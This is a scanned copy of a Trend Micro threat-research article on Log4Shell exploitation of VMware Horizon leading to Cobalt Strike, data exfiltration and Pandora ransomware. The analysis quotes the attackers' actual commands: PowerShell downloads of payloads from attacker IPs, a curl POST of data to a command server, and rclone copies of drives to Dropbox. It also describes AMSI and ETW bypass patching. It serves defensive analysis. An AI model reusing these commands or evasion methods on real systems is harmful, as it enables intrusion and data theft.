www.trendmicro.com
Open in
urlscan Pro
104.103.101.97
Public Scan
Submitted URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
Effective URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
Submission: On August 20 via api from DE — Scanned from DE
Effective URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
Submission: On August 20 via api from DE — Scanned from DE
Form analysis
2 forms found in the DOM<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
</tr>
</tbody>
</table>
</div>
</form>
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form-mobile">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
<td class="gsc-search-close collapsed" style="width:1%;" data-target="#search-mobile-wrapper" data-toggle="collapse">
<span class="icon-close"></span>
</td>
</tr>
</tbody>
</table>
</div>
</form>
Text Content
dismiss 4 Alerts * Achieving better attack surface risk management with a unified cybersecurity platform dismiss Learn more * Trend Micro Vision One™: Detect, investigate, prioritize, and respond to threats quicker dismiss Join live demos * Metaworse? The Trouble with the Metaverse dismiss Learn more * IDC announces Trend Micro is #1 in Cloud Workload Security Market Share dismiss Learn more * No new notifications at this time. Download * Scan Engines * All Pattern Files * All Downloads * Subscribe to Download Center RSS Buy * Find a Partner * Home Office Online Store * Renew Online * Contact Sales * Locations Worldwide * +202 25869400 Region * The Americas * United States * Brasil * Canada * México * Middle East & Africa * South Africa * Middle East and North Africa * Europe * België (Belgium) * Česká Republika * Danmark * Deutschland, Österreich Schweiz * España * France * Ireland * Italia * Nederland * Norge (Norway) * Polska (Poland) * Suomi (Finland) * Sverige (Sweden) * Türkiye (Turkey) * United Kingdom * Asia & Pacific * Australia * Центральная Азия (Central Asia) * Hong Kong (English) * 香港 (中文) (Hong Kong) * भारत गणराज्य (India) * Indonesia * 日本 (Japan) * 대한민국 (South Korea) * Malaysia * Монголия (Mongolia) and рузия (Georgia) * New Zealand * Philippines * Singapore * 台灣 (Taiwan) * ประเทศไทย (Thailand) * Việt Nam Log In * My Support * Log In to Support * Partner Portal * Home Solutions * My Account * Lost Device Portal * Trend Micro Vault * Password Manager * Customer Licensing Portal * Online Case Tracking * Premium Support * Worry-Free Business Security Services * Remote Manager * Cloud One * Referral Affiliate Free trials * Cloud * Detection and Response * User Protection Folio (0) Contact Us * Contact Sales * Locations * Support * Find a Partner * Learn of upcoming events * Social Media Networks * Facebook * Twitter * Linkedin * Youtube * Instagram * 1-888-762-8736 (M-F 8-5 CST) Business For Home Products Products Trend Micro One - our unified cybersecurity platform > Hybrid Cloud Security Workload Security Conformity Container Security File Storage Security Application Security Network Security Open Source Security Network Security Intrusion Prevention Advanced Threat Protection Industrial Network Security Mobile Network Security Zero Trust Secure Access User Protection Endpoint Security Email Security Mobile Security Web Security Industrial Endpoint Detection & Response XDR Risk Insights Powered by AI/Machine Learning Global Threat Intelligence All Products & Trials Our Unified Platform Service Packages Small & Midsize Business Security Solutions Solutions For Cloud Cloud Migration Cloud-Native App Development Cloud Operational Excellence Data Center Security SaaS Applications Internet of Things (IoT) ICS / OT Connected Car 5G Security for Enterprises Risk Management Ransomware Cyber Insurance End-of-Support Systems Compliance Detection and Response Industries Healthcare Manufacturing Oil & Gas Electric Utility Knowledge Hub Why Trend Micro Why Trend Micro The Trend Micro Difference Customer Successes Strategic Alliances Industry Leadership Research Research Research About Our Research Research and Analysis Research, News and Perspectives Security Reports Security News Zero Day Initiative (ZDI) Blog Research by Topic Vulnerabilities Annual Predictions The Deep Web Internet of Things (IoT) Resources DevOps Resource Center CISO Resource Center What Is? Threat Encyclopedia Cloud Health Assessment Cyber Risk Assessment Enterprise Guides Glossary of Terms EXPLORE THE CYBER RISK INDEX (CRI) Use the CRI to assess your organization’s preparedness against attacks, and get a snapshot of cyber risk across organizations globally. Calculate your risk Services & Support Services & Support Services Service Packages Managed XDR Support Services Business Support Log In to Support Technical Support Virus & Threat Help Renewals & Registration Education & Certification Contact Support Downloads Free Cleanup Tools Find a Support Partner For Popular Products Deep Security Apex One Worry-Free Worry-Free Renewals Partners Partners Channel Partners Channel Partner Overview Managed Service Provider Cloud Service Provider Professional Services Resellers Marketplace System Integrators Alliance Partners Alliance Overview Technology Alliance Partners Our Alliance Partners Tools and Resources Find a Partner Education and Certification Partner Successes Distributors Partner Login Company Company Overview Leadership Customer Success Stories Strategic Alliances Industry Accolades Newsroom Webinars Events Security Experts Careers History Corporate Social Responsibility Diversity, Equity & Inclusion Internet Safety and Cybersecurity Education Investors Privacy and Legal × Folio (0) 4 Alerts * Achieving better attack surface risk management with a unified cybersecurity platform dismiss Learn more * Trend Micro Vision One™: Detect, investigate, prioritize, and respond to threats quicker dismiss Join live demos * Metaworse? The Trouble with the Metaverse dismiss Learn more * IDC announces Trend Micro is #1 in Cloud Workload Security Market Share dismiss Learn more * No new notifications at this time. Download * Scan Engines * All Pattern Files * All Downloads * Subscribe to Download Center RSS Buy * Find a Partner * Home Office Online Store * Renew Online * Contact Sales * Locations Worldwide * +202 25869400 Region * The Americas * United States * Brasil * Canada * México * Middle East & Africa * South Africa * Middle East and North Africa * Europe * België (Belgium) * Česká Republika * Danmark * Deutschland, Österreich Schweiz * España * France * Ireland * Italia * Nederland * Norge (Norway) * Polska (Poland) * Suomi (Finland) * Sverige (Sweden) * Türkiye (Turkey) * United Kingdom * Asia & Pacific * Australia * Центральная Азия (Central Asia) * Hong Kong (English) * 香港 (中文) (Hong Kong) * भारत गणराज्य (India) * Indonesia * 日本 (Japan) * 대한민국 (South Korea) * Malaysia * Монголия (Mongolia) and рузия (Georgia) * New Zealand * Philippines * Singapore * 台灣 (Taiwan) * ประเทศไทย (Thailand) * Việt Nam Log In * My Support * Log In to Support * Partner Portal * Home Solutions * My Account * Lost Device Portal * Trend Micro Vault * Password Manager * Customer Licensing Portal * Online Case Tracking * Premium Support * Worry-Free Business Security Services * Remote Manager * Cloud One * Referral Affiliate Free trials * Cloud * Detection and Response * User Protection Folio (0) Contact Us * Contact Sales * Locations * Support * Find a Partner * Learn of upcoming events * Social Media Networks * Facebook * Twitter * Linkedin * Youtube * Instagram * 1-888-762-8736 (M-F 8-5 CST) * Achieving better attack surface risk management with a unified cybersecurity platform dismiss Learn more * Trend Micro Vision One™: Detect, investigate, prioritize, and respond to threats quicker dismiss Join live demos * Metaworse? The Trouble with the Metaverse dismiss Learn more * IDC announces Trend Micro is #1 in Cloud Workload Security Market Share dismiss Learn more * No new notifications at this time. * Scan Engines * All Pattern Files * All Downloads * Subscribe to Download Center RSS * Find a Partner * Home Office Online Store * Renew Online * Contact Sales * Locations Worldwide * +202 25869400 * The Americas * United States * Brasil * Canada * México * Middle East & Africa * South Africa * Middle East and North Africa * Europe * België (Belgium) * Česká Republika * Danmark * Deutschland, Österreich Schweiz * España * France * Ireland * Italia * Nederland * Norge (Norway) * Polska (Poland) * Suomi (Finland) * Sverige (Sweden) * Türkiye (Turkey) * United Kingdom * Asia & Pacific * Australia * Центральная Азия (Central Asia) * Hong Kong (English) * 香港 (中文) (Hong Kong) * भारत गणराज्य (India) * Indonesia * 日本 (Japan) * 대한민국 (South Korea) * Malaysia * Монголия (Mongolia) and рузия (Georgia) * New Zealand * Philippines * Singapore * 台灣 (Taiwan) * ประเทศไทย (Thailand) * Việt Nam * My Support * Log In to Support * Partner Portal * Home Solutions * My Account * Lost Device Portal * Trend Micro Vault * Password Manager * Customer Licensing Portal * Online Case Tracking * Premium Support * Worry-Free Business Security Services * Remote Manager * Cloud One * Referral Affiliate * Cloud * Detection and Response * User Protection * Contact Sales * Locations * Support * Find a Partner * Learn of upcoming events * Social Media Networks * Facebook * Twitter * Linkedin * Youtube * Instagram * 1-888-762-8736 (M-F 8-5 CST) undefined Exploits & Vulnerabilities Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware Content added to Folio Folio (0) close Exploits & Vulnerabilities LOG4SHELL VULNERABILITY IN VMWARE LEADS TO DATA EXFILTRATION AND RANSOMWARE We analyzed cases of a Log4Shell vulnerability being exploited in certain versions of the software VMware Horizon. Many of these attacks resulted in data being exfiltrated from the infected systems. However, we also found that some of the victims were infected with ransomware days after the data exfiltration. By: Mohamed Fahmy June 28, 2022 Read time: 5 min (1464 words) Save to Folio -------------------------------------------------------------------------------- Trend Micro Research recently analyzed several cases of a Log4Shell vulnerability being exploited in certain versions of the software VMware Horizon. After investigating the chain of events, we found that many of these attacks resulted in data being exfiltrated from the infected systems. However, we also found that some of the victims were infected with ransomware days after the data exfiltration. This investigation is related to a recent report from security team Sentinel Labs, which describes a technique used by the LockBit ransomware-as-a-service (RaaS) that takes advantage of a command line utility in VMware. Their investigation showed that through this utility, VMware is susceptible to sideloading DLLs. We spotted similar behavior to Sentinel Labs in terms of entry points and sideloading, but the investigation, discussed in this article, focuses on techniques of exfiltration and lateral movement. Analyzing the attack kill chain Entry point The attack starts with exploiting the Log4j vulnerability (called Log4Shell) in VMware Horizon. It then spawns a PowerShell instance to execute commands. The threat actor uses PowerShell commands to discover the victim network, then downloads mfeann.exe, LockDown.DLL, and c0000012.log. Here are the commands: net group /domain whoami c:\windows\system32\net group /domain c:\windows\system32\nltest /domain_trusts c:\windows\system32\net user StantoDe /domain c:\windows\system32\net time /domain Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/mfeann.exe -OutFile C:\users\public\mfeann.exe Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/LockDown.DLL -OutFile C:\users\public\LockDown.DLL Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/c0000012.log -OutFile C:\users\public\c0000012.log In the cases we analyzed, there were different files used to sideload malicious DLLs. The file mfeann.exe is an executable responsible for event creation and logging. It is a legitimate executable, signed by a known security company, but we found that threat actors misused it to sideload a malicious DLL named LockDown.DLL. In another intrusion we analyzed, the threat actor downloaded another legitimate executable named VMwareXferlog.exe and used the same technique to sideload the malicious DLL glib-2.0.DLL. Figure 1. Mfeann.exe signature information Figure 2. VMwareXferlog.exe signature information See the actions below: Invoke-WebRequest -uri http://45.61.139.38/VMwareXferlogs.exe -OutFile c:\programdata\VMwareXferlogs.exe; Invoke-WebRequest -uri http://45.61.139.38/glib-2.0.DLL -OutFile c:\programdata\glib-2.0.DLL; Invoke-WebRequest -uri http://45.61.139.38/vmtools.ini -OutFile c:\programdata\vmtools.ini The figure below shows the VMware Horizon Log4j exploitation, then the next step of downloading the VMware utility and malicious DLL via PowerShell (VMwareXferlog.exe and glib-2.0.DLL). Figure 3. Process chain of infection (from TrendMicro Vision One) Details of the DLL sideloading Sideloading happens after the steps described earlier — the threat actor successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and c0000012.log. Mfeann.exe is executed, an action which calls the LockDownProtectProcessById function from LockDown.DLL. Then, the execution flows to the malicious payload inside LockDown.DLL. This is the process: powershell -c curl -uri hxxp://45[.]61.137.57:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((C:\users\public\mfeann.exe))))) Figure 4. Execution flow transferred to malicious LockDown.DLL via calling the LockDownProtectProcessById function The weaponized DLL checks for the presence of a debugger and tries to bypass managed detection and response (MDR) and Microsoft's Antimalware Scan Interface (AMSI) detection. It then decrypts c0000012.log, resulting in a CobaltStrike payload (Sentinel Labs analyzed this in detail). Here is a detailed sequence of actions: 1. The anti-debugging technique checks the BeingDebugged flag inside the PEB structure. Figure 5. Anti-debugging checks 2. Next, the process tries to bypass AMSI and Microsoft event tracking. The loader attempts to evade detection in Event Tracing for Windows (ETW) and AMSI by patching EtwEventWrite and AmsiScanBuffer APIs with return from procedure (RET) instruction. The following function is used to patch both EtwEventWrite and AmsiScanBuffer: Figure 6. Technique used to bypass ETW and AMSI Figures 7 and 8 show EtwEventWrite before and after patching. Figure 7. EtwEventWrite before patching Figure 8. EtwEventWrite after patching by return instruction(0xC3) 3. Finally, the loader starts to map the encrypted CobaltStrike payload, decrypt, and load it. Figure 9. Function to map and decrypt CobaltStrike payload Figure 10. The same Function from glib-2.0.DLL with different encrypted file name Investigating notable techniques and tools Identical loaders In the intrusions that used mfeann.exe along with LockDown.DLL, or VMwareXferlog.exe with glib-2.0.DLL, both loaders were almost identical. Figure 11. Both loaders (the primary case showing the use of LockDown.DLL and secondary showing the use of glib-2.0.DLL) are identical Persistence We also observed that the spawned WerFault.exe accessed lsass.exe, and this indicates that credentials might have been dumped. Also, the threat actor utilized existing accounts by adding them to the domain admin group so they can blend in with the environment. Figure 12. Adding account to domain admin group Lateral movement to machines in the network After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is a stowaway proxy tool that is publicly available on Github. The tool is written in the GO language and can provide many capabilities to threat actors: remote shell execution, upload/downloading files, and more. In this case, the tool is used to provide a reverse shell to threat actors on IP: 45[.]32.108.54 on port 80. After a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines. Data exfiltration In one case, we found an interesting binary file named update.exe. The file is actually the rclone.exe tool used to exfiltrate data to a specific Dropbox location. While uploading the data, the Rclone tool may upload to different IPs over time: 162.125.1[.]14 (Dropbox, Inc.) 162.125.1[.]19 (Dropbox, Inc.) 162.125.2[.]14 (Dropbox, Inc.) 162.125.2[.]19 (Dropbox, Inc.) 162.125.7[.]14 (Dropbox, Inc.) 162.125.7[.]19 (Dropbox, Inc.) CLI command: cmd.exe /Q /c update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649006901.3590112 2>&1 cmd.exe /Q /c update.exe copy L: 4:2 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007703.966517 2>&1 cmd.exe /Q /c update.exe copy Q: 4:3 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007856.0151849 2>&1 In another intrusion, the same tool was used for data exfiltration using a different name: Medias.exe. Medias.exe copy '\\[Private IP] \G$' dropbox:ag -q --ignore-existing --max-age 2y --auto-confirm --multi-thread-streams 12 --transfers 10 --ignore-errors --exclude "*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}" Figure 13. Data exfiltration by the rclone.exe tool After data exfiltration In most of the analyzed intrusions, we saw the threat actors stopping after the data exfiltration phase. However, in one instance, we observed a Pandora ransomware infection 10 days after the data was exfiltrated. The sequence of events was as follows: First, the stowaway hacking tool was dropped after the malicious DLL is sideloaded via VMwareXferlog.exe utility. Then, the Rclone tool (update.exe) was dropped and used for exfiltration. Ten days later, we detected Pandora ransomware on the machine. Attack stages Figure 14. Timeline of data exfiltration and ransomware infection based on investigated cases We suspect that because there was a long period between exfiltration and ransomware infection, there are threat actors who sell access to ransomware groups after exfiltrating data. Selling access is nothing new in the underground — once one threat actor is finished with their malicious activities, they can sell their entry point to victims’ networks to other threat groups. Latest observed loader While hunting for loaders similar to LockDown.DLL and glib-2.0.DLL, we found a similar loader that was submitted to Virus Total on June 22. The loader uses the mfeann.exe ligament tool to sideload a malicious LockDown.dll. The observed sample was dropped in a way that differs from the Log4j exploit — this one was dropped via the .Net trojan “UnLockApps.exe.” The trojan dropped three files at the location %appdata% \MfeannP1ugins: * mfeann.exe: A ligament tool that sideloads the malicious LockDown.dll * LockDown.dll: A malicious DLL * avupdate_msg.avr: The encrypted cobalt strike payload Although this LockDown.dll sample was created recently (June 5, 2022) it doesn’t appear to be as complex as the older sample included in the previous sections. It does not check the debugger environment or bypass security monitoring solutions. Figure 15. LockDownProtectProcessById function This sample has the same main functionality as the previous one that loads an encrypted file and then decrypts it, resulting in a Cobalt string payload. Figure 16. Opening avupdate_msg.avr Figure 17. The decryption key Figure 18. Payload decryption function Figure 19. Decrypted Cobalt payload Security Solutions A multilayered approach can help organizations defend against this and other ransomware attacks using security technologies that can detect malicious components and suspicious behavior. * Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block suspicious behavior and tools before the ransomware can do any damage. * Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning. * Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware. * Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection. For a complete list of the Indicators of Compromise, please download this document. MITRE ATT&CK Tags Cloud | Exploits & Vulnerabilities | Research | Network | Articles, News, Reports AUTHORS * Mohamed Fahmy Threat Intelligence Analyst Contact Us RELATED ARTICLES * Protecting S3 from Malware: The Cold Hard Truth * Analyzing the Hidden Danger of Environment Variables for Keeping Secrets * What Exposed OPA Servers Can Tell You About Your Applications See all articles * Contact Sales * Locations * Careers * Newsroom * Trust Center * Privacy * Accessibility * Support * Site map * linkedin * twitter * facebook * youtube * instagram * rss Copyright © 2022 Trend Micro Incorporated. All rights reserved. sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk This website uses cookies for website functionality, traffic analytics, personalization, social media functionality and advertising. Our Cookie Notice provides more information and explains how to amend your cookie settings.Learn more Cookies Settings Accept AddThis Sharing Sidebar Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintMore AddThis Share optionsAddThis 2 SHARES Hide Show Close AddThis